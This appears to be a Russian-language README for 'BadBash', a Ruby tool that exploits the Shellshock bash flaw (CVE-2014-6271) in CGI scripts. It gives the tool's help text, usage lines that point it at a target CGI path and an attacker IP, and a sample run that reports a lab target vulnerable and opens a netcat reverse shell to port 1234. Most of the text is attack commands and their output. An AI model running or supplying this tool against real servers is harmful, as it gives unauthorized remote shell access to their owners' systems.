
CVE-2014-6271 RCE tool
BadBash — это инструмент эксплуатации RCE CVE-2014-6271. Базовая версия только проверяет HTTP CGI сайт и предоставляет обратную оболочку netcat на порту 1234.
Разработчик : Andy Yang Версия : 0.1.0 Лицензия : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - инструмент RCE CVE-2014-6271 от Andy Yang Базовая версия только проверяет HTTP сайт Базовая версия предоставляет обратную оболочку netcat на порту 1234
ПРИМЕР ИСПОЛЬЗОВАНИЯ:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Полный путь к CGI-странице
-d, --Destination IP Ваш IP-адрес для приема входящего соединения
-h, --help Показать справку
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Проверка уязвимости цели........
[Info] Это может занять до 10 секунд........
[Info] Цель уязвима!!!
[Info] Пожалуйста, используйте netcat для прослушивания порта 1234 для обратной оболочки..........
[Info] Эксплуатация для обратной оболочки на подключение к 172.16.189.1:1234 через netcat ..........